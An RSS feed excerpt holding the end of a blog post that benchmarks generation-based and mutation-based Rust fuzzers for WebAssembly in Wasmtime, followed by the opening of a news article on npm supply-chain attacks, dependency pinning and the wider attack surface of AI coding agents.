    <span class="k">let</span> <span class="k">mut</span> <span class="n">candidates</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">Inst</span><span class="o">&gt;</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
    <span class="k">match</span> <span class="n">target_ty</span> <span class="p">{</span>
        <span class="nf">Some</span><span class="p">(</span><span class="n">I32</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">I32Const</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Add</span><span class="p">);</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Sub</span><span class="p">);</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Mul</span><span class="p">);</span>
            <span class="c1">// ...</span>
        <span class="p">}</span>
        <span class="nf">Some</span><span class="p">(</span><span class="n">I64</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">I64Const</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Add</span><span class="p">);</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Sub</span><span class="p">);</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Mul</span><span class="p">);</span>
            <span class="c1">// ...</span>
        <span class="p">}</span>
        <span class="nf">Some</span><span class="p">(</span><span class="n">F32</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">F32Const</span><span class="p">(</span><span class="mf">0.0</span><span class="p">));</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">F32Add</span><span class="p">);</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">F32Sub</span><span class="p">);</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">F32Mul</span><span class="p">);</span>
            <span class="c1">// ...</span>
        <span class="p">}</span>
        <span class="c1">// ...</span>
        <span class="nb">None</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Nothing needed. `drop`, `global.set`, and</span>
            <span class="c1">// stores add demand.</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nb">Drop</span><span class="p">);</span>
            <span class="k">if</span> <span class="n">globals</span><span class="nf">.iter</span><span class="p">()</span><span class="nf">.any</span><span class="p">(|</span><span class="n">g</span><span class="p">|</span> <span class="n">g</span><span class="py">.mutable</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">GlobalSet</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
            <span class="p">}</span>
            <span class="k">if</span> <span class="n">num_memories</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">{</span>
                <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">I32Store</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
                <span class="c1">// ...</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="k">let</span> <span class="k">mut</span> <span class="n">inst</span> <span class="o">=</span> <span class="o">*</span><span class="n">u</span><span class="nf">.choose</span><span class="p">(</span><span class="o">&amp;</span><span class="n">candidates</span><span class="p">)</span><span class="o">?</span><span class="p">;</span>

    <span class="c1">// If the instruction has immediates, generate</span>
    <span class="c1">// them here, as they were hard-coded during</span>
    <span class="c1">// candidate selection. Same as `bottom_up`.</span>
    <span class="k">match</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">inst</span> <span class="p">{</span>
        <span class="c1">// ...</span>
    <span class="p">}</span>

    <span class="nf">Ok</span><span class="p">(</span><span class="n">inst</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Similar to <code class="language-plaintext highlighter-rouge">bottom_up</code>, after we’ve constructed a <code class="language-plaintext highlighter-rouge">Module</code> via <code class="language-plaintext highlighter-rouge">top_down</code>, we
don’t need to call <code class="language-plaintext highlighter-rouge">fixup</code> because the module is already valid by construction.
All that’s left is invoking <code class="language-plaintext highlighter-rouge">Module::to_wasm_binary</code> to get the encoded Wasm
program.</p>

<h4><code class="language-plaintext highlighter-rouge">mutate</code></h4>

<p><code class="language-plaintext highlighter-rouge">mutate</code> is, as the name implies, a mutator rather than a generator. It is the
direct equivalent of the <code class="language-plaintext highlighter-rouge">arb</code> generator, but for mutation: it uses
<code class="language-plaintext highlighter-rouge">derive(mutatis::Mutate)</code> on <code class="language-plaintext highlighter-rouge">Module</code> and <code class="language-plaintext highlighter-rouge">Inst</code> to automatically generate
custom mutators for these types, rather than authoring them by hand. After
producing a new <code class="language-plaintext highlighter-rouge">Module</code> by mutating an old <code class="language-plaintext highlighter-rouge">Module</code>, that new <code class="language-plaintext highlighter-rouge">Module</code> probably
represents an invalid Wasm program, in the same way that
<code class="language-plaintext highlighter-rouge">derive(arbitrary::Arbitrary)</code> produces <code class="language-plaintext highlighter-rouge">Module</code>s that are probably invalid. And
<code class="language-plaintext highlighter-rouge">mutate</code> also uses the same approach that <code class="language-plaintext highlighter-rouge">arb</code> does to resolve this problem:
the <code class="language-plaintext highlighter-rouge">fixup</code> method.</p>

<p>But first, a mutator-specific wrinkle is that <code class="language-plaintext highlighter-rouge">fuzz_mutator!</code> gives us a mutable
byte slice to mutate, not a <code class="language-plaintext highlighter-rouge">Module</code>. We address this gap by deriving the
<a href="https://serde.rs/"><code class="language-plaintext highlighter-rouge">serde</code></a> crate’s <code class="language-plaintext highlighter-rouge">Serialize</code> and <code class="language-plaintext highlighter-rouge">Deserialize</code> traits on <code class="language-plaintext highlighter-rouge">Module</code> and <code class="language-plaintext highlighter-rouge">Inst</code>,
deserializing a <code class="language-plaintext highlighter-rouge">Module</code> from the mutable byte slice, mutating that deserialized
<code class="language-plaintext highlighter-rouge">Module</code> with <code class="language-plaintext highlighter-rouge">mutatis</code>, and then reserializing it back into the mutable byte
slice. We use the <a href="https://docs.rs/postcard"><code class="language-plaintext highlighter-rouge">postcard</code></a> crate here, but could just as easily use
<a href="https://docs.rs/bincode"><code class="language-plaintext highlighter-rouge">bincode</code></a>, JSON, or protobuf.</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">libfuzzer_sys</span><span class="p">::{</span><span class="n">fuzz_mutator</span><span class="p">,</span> <span class="n">fuzz_target</span><span class="p">,</span> <span class="n">fuzzer_mutate</span><span class="p">};</span>

<span class="nd">fuzz_mutator!</span><span class="p">(|</span>
    <span class="n">data</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="p">[</span><span class="nb">u8</span><span class="p">],</span>
    <span class="n">size</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>
    <span class="n">max_size</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>
    <span class="n">seed</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
<span class="p">|</span> <span class="p">{</span>
    <span class="c1">// With probability of about 1/8, use default</span>
    <span class="c1">// mutator.</span>
    <span class="k">if</span> <span class="n">seed</span><span class="nf">.count_ones</span><span class="p">()</span> <span class="o">%</span> <span class="mi">8</span> <span class="o">==</span> <span class="mi">0</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nf">fuzzer_mutate</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">max_size</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Try to decode using postcard; fallback to</span>
    <span class="c1">// default input on failure.</span>
    <span class="k">let</span> <span class="k">mut</span> <span class="n">module</span><span class="p">:</span> <span class="n">Module</span> <span class="o">=</span>
        <span class="nn">postcard</span><span class="p">::</span><span class="nf">from_bytes</span><span class="p">(</span><span class="o">&amp;</span><span class="n">data</span><span class="p">[</span><span class="o">..</span><span class="n">size</span><span class="p">])</span>
            <span class="nf">.ok</span><span class="p">()</span>
            <span class="nf">.unwrap_or_default</span><span class="p">();</span>

    <span class="c1">// Mutate with `mutatis`.</span>
    <span class="k">let</span> <span class="k">mut</span> <span class="n">session</span> <span class="o">=</span> <span class="nn">mutatis</span><span class="p">::</span><span class="nn">Session</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span>
        <span class="nf">.seed</span><span class="p">(</span><span class="n">seed</span><span class="nf">.into</span><span class="p">())</span>
        <span class="nf">.shrink</span><span class="p">(</span><span class="n">max_size</span> <span class="o">&lt;</span> <span class="n">size</span><span class="p">);</span>
    <span class="k">if</span> <span class="n">session</span><span class="nf">.mutate</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">module</span><span class="p">)</span><span class="nf">.is_ok</span><span class="p">()</span> <span class="p">{</span>
        <span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">encoded</span><span class="p">)</span> <span class="o">=</span> <span class="nn">postcard</span><span class="p">::</span><span class="nf">to_slice</span><span class="p">(</span>
            <span class="o">&amp;</span><span class="n">module</span><span class="p">,</span>
            <span class="n">data</span><span class="p">,</span>
        <span class="p">)</span> <span class="p">{</span>
            <span class="k">return</span> <span class="n">encoded</span><span class="nf">.len</span><span class="p">();</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="c1">// Fallback to the default libfuzzer mutator if</span>
    <span class="c1">// serialization or mutation fails because, for</span>
    <span class="c1">// example, `data` doesn't have enough capacity.</span>
    <span class="nf">fuzzer_mutate</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">max_size</span><span class="p">)</span>
<span class="p">});</span>
</code></pre></div></div>

<p>Finally, the fuzz target itself deserializes the <code class="language-plaintext highlighter-rouge">Module</code> from the raw bytes,
calls <code class="language-plaintext highlighter-rouge">fixup</code>, encodes it to a Wasm binary via <code class="language-plaintext highlighter-rouge">Module::to_wasm_binary</code>, and
then passes that into Wasmtime.</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">fuzz_target!</span><span class="p">(|</span><span class="n">data</span><span class="p">:</span> <span class="o">&amp;</span><span class="p">[</span><span class="nb">u8</span><span class="p">]|</span> <span class="p">{</span>
    <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="k">mut</span> <span class="n">module</span><span class="p">)</span> <span class="o">=</span> <span class="nn">postcard</span><span class="p">::</span><span class="nn">from_bytes</span><span class="p">::</span><span class="o">&lt;</span><span class="n">Module</span><span class="o">&gt;</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="k">else</span> <span class="p">{</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">};</span>
    <span class="n">module</span><span class="nf">.fixup</span><span class="p">(||</span> <span class="mi">0</span><span class="p">);</span>
    <span class="k">let</span> <span class="n">wasm</span> <span class="o">=</span> <span class="n">module</span><span class="nf">.to_wasm_binary</span><span class="p">();</span>

    <span class="c1">// ...</span>
<span class="p">});</span>
</code></pre></div></div>

<h3>Benchmarking</h3>

<h4>Methodology</h4>

<p>We pair each of our generators and mutator with <a href="https://github.com/rust-fuzz/libfuzzer"><code class="language-plaintext highlighter-rouge">libfuzzer-sys</code></a> and feed the
resulting test cases into <a href="https://wasmtime.dev/">Wasmtime</a>. All fuzzers start with an empty corpus.</p>

<p>The most important metric for a fuzzer is its bug-finding ability, but that can
be difficult to measure directly. For example, Wasmtime is actively fuzzed 24/7
with more-complete fuzzers than those implemented here, so, as expected, I have
not found any bugs via these benchmarks. Therefore, instead of reporting a
found-bugs count, the benchmark harness reports two alternative metrics:</p>

<ol>
  <li>
    <p><strong><em>Coverage over time:</em></strong> Coverage is the cumulative code paths exercised by
the fuzzer. A fuzzer cannot find bugs in code paths it does not cover. <em>This
is the most important metric reported.</em></p>
  </li>
  <li>
    <p><strong><em>Executions over time:</em></strong> An execution is one iteration of the fuzzing
loop. This is basically measuring how fast the fuzzer can produce test
cases. All else being equal, more executions is better, but all else is
rarely equal. It is easy to generate poor test cases very quickly: just
return an empty sequence of Wasm instructions every time. Unfortunately, that
exclusively leads to useless executions. Therefore, this metric is really
only useful when comparing two implementations of the same algorithm, and
I’ve omitted its results in the next section.</p>
  </li>
</ol>

<p>Additionally, I report results for both 24 hours of fuzzing and 5 minutes of
fuzzing. The expected behavior of long-term fuzzing, e.g. 24/7 fuzzing in
<a href="https://github.com/google/oss-fuzz">OSS-Fuzz</a>, can be extrapolated from the 24-hour results. The 5-minute results
show the expected behavior of short-term fuzzing, e.g. when using
<a href="https://docs.rs/mutatis/latest/mutatis/check/index.html"><code class="language-plaintext highlighter-rouge">mutatis::check</code></a> or <a href="https://docs.rs/arbtest/latest/arbtest/"><code class="language-plaintext highlighter-rouge">arbtest</code></a>.</p>

<p>Discussion of short-term fuzzing is somewhat rare, so I feel its motivation
deserves explanation. I find short-term fuzzing useful in the following
scenarios, for example:</p>

<ul>
  <li>Running a quick fuzzing session locally, to catch bugs that avoid detection in
the traditional unit- and integration-test suites, before opening a pull
request.</li>
  <li>Running some quick fuzzing in CI before allowing a pull request to merge, for
similar reasons.</li>
</ul>

<p>That is, short-term fuzzing is useful for the same reasons and in the same
scenarios as property-based testing.<sup><a class="footnote" href="https://fitzgeraldnick.com/weblog/feeds/latest-atom/#fn:pbt" rel="footnote">3</a></sup></p>

<p>As recommended in <a href="https://arxiv.org/abs/1808.09700"><em>Evaluating Fuzz Testing</em></a> by Klees, Ruef, Cooper,
Wei, and Hicks and adopted in <a href="https://storage.googleapis.com/gweb-research2023-media/pubtools/6318.pdf"><em>Fuzz Bench: An Open Fuzzer Benchmarking Platform
and Service</em></a> by Metzman, Szekeres, Simon, Sprabery, and Arya, the
benchmark harness tests the statistical significance of its results with a
<a href="https://en.wikipedia.org/wiki/Mann%E2%80%93Whitney_U_test">Mann-Whitney U-test</a>. The harness performs 20 trials per fuzzer, the same
number of trials as <em>Fuzz Bench</em>.</p>

<h4>Results</h4>

<h5>24 Hours of Fuzzing</h5>

<ul>
  <li>
    <p><code class="language-plaintext highlighter-rouge">arb</code> has 1.00 ± 0.00 times more coverage than <code class="language-plaintext highlighter-rouge">bottom_up</code> (p = 0.01)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">mutate</code> has 1.01 ± 0.00 times more coverage than <code class="language-plaintext highlighter-rouge">arb</code> (p = 0.00)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">top_down</code> has 1.00 ± 0.00 times more coverage than <code class="language-plaintext highlighter-rouge">arb</code> (p = 0.00)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">mutate</code> has 1.02 ± 0.00 times more coverage than <code class="language-plaintext highlighter-rouge">bottom_up</code> (p = 0.00)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">top_down</code> has 1.01 ± 0.00 times more coverage than <code class="language-plaintext highlighter-rouge">bottom_up</code> (p = 0.00)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">mutate</code> has 1.01 ± 0.00 times more coverage than <code class="language-plaintext highlighter-rouge">top_down</code> (p = 0.00)</p>
  </li>
</ul>

<p><a href="https://raw.githubusercontent.com/fitzgen/fuzz-experiment/9c059bbe2835b2123ed379994eec76fe9278e962/results-24h/coverage-over-time.svg">
  <img src="https://raw.githubusercontent.com/fitzgen/fuzz-experiment/9c059bbe2835b2123ed379994eec76fe9278e962/results-24h/coverage-over-time.svg">
</a></p>

<h5>5 Minutes of Fuzzing</h5>

<ul>
  <li>
    <p><code class="language-plaintext highlighter-rouge">bottom_up</code> has 1.01 ± 0.01 times more coverage than <code class="language-plaintext highlighter-rouge">arb</code> (p = 0.04)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">mutate</code> has 1.47 ± 0.02 times more coverage than <code class="language-plaintext highlighter-rouge">arb</code> (p = 0.00)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">top_down</code> has 1.06 ± 0.02 times more coverage than <code class="language-plaintext highlighter-rouge">arb</code> (p = 0.00)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">mutate</code> has 1.45 ± 0.01 times more coverage than <code class="language-plaintext highlighter-rouge">bottom_up</code> (p = 0.00)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">top_down</code> has 1.05 ± 0.02 times more coverage than <code class="language-plaintext highlighter-rouge">bottom_up</code> (p = 0.00)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">mutate</code> has 1.38 ± 0.02 times more coverage than <code class="language-plaintext highlighter-rouge">top_down</code> (p = 0.00)</p>
  </li>
</ul>

<p><a href="https://raw.githubusercontent.com/fitzgen/fuzz-experiment/9c059bbe2835b2123ed379994eec76fe9278e962/results-5m/coverage-over-time.svg">
  <img src="https://raw.githubusercontent.com/fitzgen/fuzz-experiment/9c059bbe2835b2123ed379994eec76fe9278e962/results-5m/coverage-over-time.svg">
</a></p>

<h3>Conclusion</h3>

<p><strong>The <code class="language-plaintext highlighter-rouge">mutate</code> fuzzer performs best.</strong> It vastly outperforms all the others at 5
minutes of fuzzing (36-49% more coverage), and while the rest narrow that gap
after 24 hours of fuzzing, <code class="language-plaintext highlighter-rouge">mutate</code> maintains its lead (1-2% more coverage).</p>

<p>The comparison between <code class="language-plaintext highlighter-rouge">arb</code> and <code class="language-plaintext highlighter-rouge">mutate</code> is as apples-to-apples of a comparison
as it gets between idiomatic test-case generation and mutation in Rust:
<code class="language-plaintext highlighter-rouge">derive(Arbitrary)</code> and <code class="language-plaintext highlighter-rouge">derive(Mutate)</code>. They use the same <code class="language-plaintext highlighter-rouge">fixup</code> method to
ensure that the resulting Wasm instructions are valid. The fuzzer built with
<code class="language-plaintext highlighter-rouge">mutatis</code> and test-case mutation provides better coverage over time than the
fuzzer built with <code class="language-plaintext highlighter-rouge">arbitrary</code> and test-case generation. When writing
structure-aware fuzzers, I used to reach for <a href="https://github.com/rust-fuzz/arbitrary"><code class="language-plaintext highlighter-rouge">arbitrary</code></a>; in the future, I
will reach for <a href="https://docs.rs/mutatis"><code class="language-plaintext highlighter-rouge">mutatis</code></a> instead.</p>

<p>The <code class="language-plaintext highlighter-rouge">top_down</code> fuzzer performs second-best, and is best of the generation-based
fuzzers. This aligns with results from the <a href="https://insuyun.github.io/pubs/2025/park:rgfuzz.pdf"><code class="language-plaintext highlighter-rouge">rgfuzz</code></a> paper, which found that
top-down Wasm instruction generation resulted in better instruction diversity
than bottom-up generation. This result is intuitive, they point out, because
Wasm instructions tend to have more operands than results, which means that more
candidates are filtered out from consideration when generating instructions in
forward order from operands to results (bottom-up) than when generating them in
backward order from results to operands (top-down).</p>

<p>Subjectively, none of the approaches feel significantly more-complicated nor
easier to implement than the others. All approaches require a stack of types,
representing the generated Wasm’s operand stack, at some point in their
implementation. Some require it during instruction generation (<code class="language-plaintext highlighter-rouge">top_down</code> and
<code class="language-plaintext highlighter-rouge">bottom_up</code>) while others require it during <code class="language-plaintext highlighter-rouge">fixup</code> (<code class="language-plaintext highlighter-rouge">mutate</code> and <code class="language-plaintext highlighter-rouge">arb</code>). Adding
support for new Wasm instructions is roughly the same in all of them: add a new
variant to <code class="language-plaintext highlighter-rouge">enum Inst</code> and define its operand and result types. <code class="language-plaintext highlighter-rouge">top_down</code> and
<code class="language-plaintext highlighter-rouge">bottom_up</code> additionally require adding a line for the new instruction in their
<code class="language-plaintext highlighter-rouge">choose_inst_{top_down,bottom_up}</code> functions, but this could be avoided with
some targeted <code class="language-plaintext highlighter-rouge">macro_rules!</code> sugar.</p>

<p>The <code class="language-plaintext highlighter-rouge">fixup</code> method fixes instructions in a forwards order; as future work, it
would be interesting to implement a <code class="language-plaintext highlighter-rouge">backwards_fixup</code> method that fixes
instructions in a backwards order and see if <code class="language-plaintext highlighter-rouge">mutate</code> and <code class="language-plaintext highlighter-rouge">backwards_fixup</code>
outperforms the current <code class="language-plaintext highlighter-rouge">mutate</code> and forwards <code class="language-plaintext highlighter-rouge">fixup</code> the same way that
backwards generation (<code class="language-plaintext highlighter-rouge">top_down</code>) outperforms forwards generation
(<code class="language-plaintext highlighter-rouge">bottom_up</code>).</p>

<p><code class="language-plaintext highlighter-rouge">fixup</code> makes an attempt to reuse stack operands when it can, rather than
synthesize dummy constants or <code class="language-plaintext highlighter-rouge">drop</code> already-computed values, but the attempt is
somewhat half-hearted. Dropping operands introduces dead code, which is not very
interesting for exercising deep into the compiler pipeline. Dummy constants are
not that interesting either. Therefore, another potential line of follow-up work
would be to investigate ways to maximize operand reuse and minimize <code class="language-plaintext highlighter-rouge">drop</code>s and
dummy constants inserted while ensuring validity. That could include storing
values to memory or globals instead of <code class="language-plaintext highlighter-rouge">drop</code>ing them when possible. It could
even include liberating ourselves from the stack-focused paradigm we’ve had thus
far.</p>

<p>WebAssembly is a stack-based language and so it is natural that our approaches
have focused on producing stack-y code. But, in practice, optimizing WebAssembly
compilers like Wasmtime’s use a <a href="https://en.wikipedia.org/wiki/Static_single-assignment_form">static single-assignment</a> intermediate
representation, and erase the operand stack early in their compilation
pipelines. Therefore, from these compilers’ point of view, the following two
WebAssembly snippets are identical:</p>

<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">;; `x = a + (b * c)` in a "stack-y" encoding and</span>
<span class="c1">;; without temporary locals.</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">a</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">b</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">c</span>
<span class="nf">i32.mul</span>
<span class="nf">i32.add</span>
<span class="nf">local.set</span> <span class="kc">$</span><span class="nv">x</span>

<span class="c1">;; `x = a + (b * c)` in a "non-stack-y" encoding</span>
<span class="c1">;; that uses temporary locals for every operation.</span>
<span class="c1">;;</span>
<span class="c1">;; Equivalent of</span>
<span class="c1">;;</span>
<span class="c1">;;     temp0 = b * c</span>
<span class="c1">;;     temp1 = a + temp0</span>
<span class="c1">;;     x = temp1</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">b</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">c</span>
<span class="nf">i32.mul</span>
<span class="nf">local.set</span> <span class="kc">$</span><span class="nv">temp0</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">a</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">temp0</span>
<span class="nf">i32.add</span>
<span class="nf">local.set</span> <span class="kc">$</span><span class="nv">temp1</span>
<span class="nf">local.get</span> <span class="kc">$</span><span class="nv">temp1</span>
<span class="nf">local.set</span> <span class="kc">$</span><span class="nv">x</span>
</code></pre></div></div>

<p>Producing code that uses many temporaries in this manner might be easier than
code that doesn’t, but, more importantly, it may enable better reuse of
already-computed subexpressions, emit less dead code, and ultimately produce
more interesting data-flow graphs that better exercise the deep innards of the
compiler.</p>

<p>A final vein of interesting follow-up work to mine would be comparing
<code class="language-plaintext highlighter-rouge">arbitrary</code>-based generators and <code class="language-plaintext highlighter-rouge">mutatis</code>-based mutators for structured inputs
that are not programming languages and when the SUT we are fuzzing is not a
compiler. Do we see these same results when, for example, producing PNG images
to fuzz an image-transformation library?</p>

<p><a href="https://github.com/fitzgen/fuzz-experiment">Here is the source code for this experiment, including the three generators,
one mutator, raw benchmark data, and benchmarking harness.</a> The <code class="language-plaintext highlighter-rouge">README</code>
includes instructions on running the benchmarks yourself.</p>

<hr>

<div class="footnotes">
  <ol>
    <li>
      <p>WebAssembly’s stack-based instructions encode an expression tree
— <code class="language-plaintext highlighter-rouge">local.get $a; local.get $b; local.get $c; i32.add; i32.mul</code> is
isomorphic to <code class="language-plaintext highlighter-rouge">a * (b + c)</code> — so the experiment should be relevant and
applicable to any other generator or mutator for a programming language with
expressions, even if it might not appear so at first glance. <a class="reversefootnote" href="https://fitzgeraldnick.com/weblog/feeds/latest-atom/#fnref:applicable">↩</a></p>
    </li>
    <li>
      <p>Ignoring its rule-guided bit, which is orthogonal and could be
applied to <code class="language-plaintext highlighter-rouge">bottom_up</code> as well. <a class="reversefootnote" href="https://fitzgeraldnick.com/weblog/feeds/latest-atom/#fnref:rule-guided">↩</a></p>
    </li>
    <li>
      <p>Structure-aware fuzzing and property-based testing are <a href="https://docs.rs/mutatis/latest/mutatis/_guide/comparisons/index.html#comparison-to-property-based-testing">basically the
same</a>:
convergent evolution from different communities. <a class="reversefootnote" href="https://fitzgeraldnick.com/weblog/feeds/latest-atom/#fnref:pbt">↩</a></p>
    </li>
  </ol>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI’s brave new world of technical debt]]></title>
<description><![CDATA[Mitchell Hashimoto wants you to stop updating your dependencies, which, from a historical context, is certifiably insane. In fact, in the wake of Mythos and the potential to make zero-day exploits common, it still may sound insane. Yet after the spring npm just had, Hashimoto’s counsel may actual...]]></description>
<link>https://tsecurity.de/de/3562487/ai-nachrichten/ais-brave-new-world-of-technical-debt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562487/ai-nachrichten/ais-brave-new-world-of-technical-debt/</guid>
<pubDate>Mon, 01 Jun 2026 11:18:56 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Mitchell Hashimoto <a href="https://x.com/mitchellh/status/2057171518027887035">wants you to stop updating your dependencies</a>, which, from a historical context, is certifiably insane. In fact, in the wake of <a href="https://www.csoonline.com/article/4158117/anthropics-mythos-signals-a-structural-cybersecurity-shift.html" data-type="link" data-id="https://www.csoonline.com/article/4158117/anthropics-mythos-signals-a-structural-cybersecurity-shift.html">Mythos</a> and the <a href="https://www.cfr.org/articles/six-reasons-claude-mythos-is-an-inflection-point-for-ai-and-global-security">potential to make zero-day exploits common</a>, it still may sound insane. Yet after the spring npm just had, Hashimoto’s counsel may actually sound less like heresy and more like control.</p>



<p>His rule? Fork your dependencies, trim them to what you actually use, and don’t update unless something breaks for your users. In Hashimoto’s view, you don’t update just because GitHub’s Dependabot opened a pull request or even because there’s a newer (presumably more secure) version. If you do update, the work of understanding every relevant commit in the transitive tree is yours, not the maintainer’s.</p>



<p>In an industry trained to equate “latest” with “secure,” this sounds reckless, until you look at what happened this spring. In two of the year’s worst npm attacks, many of the people most exposed were the ones pulling fresh versions. When <a href="https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan">the axios HTTP client library was compromised</a>, attackers pushed two poisoned releases that dropped a remote-access Trojan on every machine that ran a fresh install during a roughly three-hour window. If you were pinned to a clean version and didn’t reinstall, you slept through it. Kudos to you. Weeks later, on the heels of a <a href="https://www.stepsecurity.io/blog/node-ipc-npm-supply-chain-attack">poisoned node-ipc release</a>, the <a href="https://www.stepsecurity.io/blog/mini-shai-hulud-is-back-a-self-spreading-supply-chain-attack-hits-the-npm-ecosystem">Mini Shai-Hulud worm</a> self-propagated through TanStack and on to Mistral, UiPath, and a long tail of packages downloaded millions of times a week.</p>



<p>How do you defend against that?</p>



<p>Maybe by doing nothing. After all, the single most effective defense against Mini Shai-Hulud wasn’t a scanner or a signature. It was a cooldown. StepSecurity held newly published versions for a configurable window, around 10 days, before serving them to anyone. Customers on the cooldown kept getting the last known-good release and were never exposed, while the rest of the world found out the hard way.</p>



<p>In other words, the defense that worked was the unfashionable (and historically foolish) one: Don’t take the new version just because it’s new. Ironically, the industry’s answer to AI development seems to be to add more dependencies. What could go wrong?</p>



<h2 class="wp-block-heading"><a></a>The dependency tree escaped the package manager</h2>



<p>For decades we’ve outsourced undifferentiated work to libraries, and mostly that’s good. After all, no one wants every team to hand-roll Transport Layer Security, date parsing, logging, etc., except perhaps the sort of person who compiles Gentoo for fun. (We know who you are!) Open source works because we specialize and share.</p>



<p>Sharing means we also borrow each other’s package managers, maintainer accounts, <a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">CI/CD pipelines</a>, release scripts, etc. The miracle of modern software is that a small team can build something world-class out of a thousand components it didn’t write. That’s also the risk.</p>



<p>AI compounds this risk because the dependency tree is no longer confined to code.</p>



<p>A coding agent doesn’t just import packages: It also reads repo instructions, follows system prompts, picks tools, talks to <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP) servers, and runs shell commands. Each capability is another dependency on behavior that lives outside the model. Some of this is useful, of course, but all of it is surface area, open to attack.</p>



